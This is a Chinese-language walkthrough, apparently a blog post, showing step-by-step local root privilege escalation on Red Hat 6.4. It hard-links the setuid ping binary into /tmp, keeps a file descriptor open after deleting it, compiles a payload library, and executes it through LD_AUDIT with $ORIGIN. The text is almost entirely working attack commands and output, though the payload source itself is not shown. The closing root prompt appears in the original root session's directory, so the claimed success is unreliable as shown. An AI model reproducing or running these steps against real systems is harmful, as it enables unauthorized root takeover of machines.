本次演示只針對redhat6.4, 其他的系統不知道有沒有效果。
下面開始吧
建立普通用戶並授予密碼
[root@localhost yum.repos.d]# useradd test [root@localhost yum.repos.d]# passwd test 更改用戶 test 的密碼 。 新的 密碼: 無效的密碼: 它基於字典單詞 重新輸入新的 密碼: passwd: 所有的身份驗證令牌已經成功更新。
切換身份
[root@localhost yum.repos.d]# su - test [test@localhost ~]$ whoami test
演示權限
[test@localhost ~]$ useradd aaa -bash: /usr/sbin/useradd: 權限不夠
下面開始利用ping
[test@localhost ~]$ mkdir /tmp/exploit [test@localhost ~]$ ln /bin/ping /tmp/exploit/target [test@localhost ~]$ exec 3< /tmp/exploit/target [test@localhost ~]$ ls -l /proc/$$/fd/3 lr-x------. 1 test test 64 2月 27 00:17 /proc/1665/fd/3 -> /tmp/exploit/target [test@localhost ~]$ rm -rf /tmp/exploit/ [test@localhost ~]$ ls -l /proc/$$/fd/3 lr-x------. 1 test test 64 2月 27 00:17 /proc/1665/fd/3 -> /tmp/exploit/target (deleted)
下面使用gcc提權
[test@localhost ~]$ vim payload.c
[test@localhost ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[test@localhost ~]$ ls
payload.c
[test@localhost ~]$ ls -l /tmp/exploit
-rwxrwxr-x. 1 test test 6060 2月 27 00:18 /tmp/exploit
[test@localhost ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@localhost yum.repos.d]# whoami
root
[root@localhost yum.repos.d]#
一氣呵成!
